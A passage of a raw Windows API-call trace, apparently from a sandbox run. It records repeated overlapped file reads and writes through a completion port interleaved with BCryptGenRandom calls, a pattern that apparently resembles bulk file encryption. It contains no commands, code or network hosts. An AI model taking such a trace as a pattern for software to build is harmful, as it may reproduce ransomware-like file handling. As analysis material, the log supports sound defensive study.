dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.240] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5b38, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0176.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.272] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0176.272] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.272] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.272] free (_Block=0x3e305b8) [0176.272] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.272] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.273] free (_Block=0x1fa91d0) [0176.273] free (_Block=0x1fa2ed8) [0176.273] free (_Block=0x1fa90b8) [0176.273] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0176.273] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.275] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x10760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0176.275] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.277] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x43b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0176.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.307] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x75ca, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.321] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.329] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0176.330] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0176.330] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.330] free (_Block=0x3e305b8) [0176.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.330] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.331] free (_Block=0x1fa91d0) [0176.331] free (_Block=0x1fa2ed8) [0176.331] free (_Block=0x1fa90b8) [0176.331] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0176.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.380] CloseHandle (hObject=0x338) returned 1 [0176.380] free (_Block=0x3d70450) [0176.380] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.384] CloseHandle (hObject=0x3cc) returned 1 [0176.384] free (_Block=0x3f70048) [0176.384] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.385] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x47a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0176.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.410] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x2566, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0176.413] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.604] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1d20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0176.604] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.613] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.613] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0176.613] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.614] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0176.614] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.614] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.614] free (_Block=0x3e305b8) [0176.614] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.614] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.615] free (_Block=0x1fa91d0) [0176.615] free (_Block=0x1fa2ed8) [0176.615] free (_Block=0x1fa90b8) [0176.615] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.615] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.625] CloseHandle (hObject=0x2a8) returned 1 [0176.625] free (_Block=0x3f70048) [0176.625] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.642] ReadFile (in: hFile=0x338, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x24c8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0176.648] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.660] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0176.660] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.660] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0176.660] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.660] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.660] free (_Block=0x3e305b8) [0176.661] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.661] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.661] free (_Block=0x1fa91d0) [0176.661] free (_Block=0x1fa2ed8) [0176.661] free (_Block=0x1fa90b8) [0176.661] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0176.661] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.668] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.669] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0176.669] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.669] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0176.669] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.670] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.670] free (_Block=0x3e305b8) [0176.670] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.670] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.670] free (_Block=0x1fa91d0) [0176.670] free (_Block=0x1fa2ed8) [0176.670] free (_Block=0x1fa90b8) [0176.670] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0176.670] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.678] CloseHandle (hObject=0x2a8) returned 1 [0176.678] free (_Block=0x3f70048) [0176.678] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.679] CloseHandle (hObject=0x170) returned 1 [0176.679] free (_Block=0x3e70008) [0176.679] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.679] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.679] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.681] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0176.681] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0177.030] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x382a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.041] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0177.053] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x540, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0177.053] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0177.061] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x334, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0177.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0177.067] ReadFile (in: hFile=0x2a4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x900, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0177.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0177.076] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.076] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0177.076] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.077] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0177.077] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.077] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.077] free (_Block=0x3e305b8) [0177.077] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.077] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.078] free (_Block=0x1fa91d0) [0177.078] free (_Block=0x1fa2ed8) [0177.078] free (_Block=0x1fa90b8) [0177.078] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.078] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0177.305] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x19d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0177.313] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x5ff0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0177.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0177.320] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x7f50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0177.321] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0177.328] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x4310, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0177.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0177.339] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.339] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0177.339] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.340] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0177.340] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.340] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.340] free (_Block=0x3e305b8) [0177.340] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.340] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.340] free (_Block=0x1fa91d0) [0177.340] free (_Block=0x1fa2ed8) [0177.340] free (_Block=0x1fa90b8) [0177.340] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.341] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0177.372] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.373] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0177.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.373] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0177.374] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.374] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.374] free (_Block=0x3e305b8) [0177.374] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.374] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.374] free (_Block=0x1fa91d0) [0177.374] free (_Block=0x1fa2ed8) [0177.374] free (_Block=0x1fa90b8) [0177.374] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0177.374] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.370] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.370] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.373] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0179.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0179.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 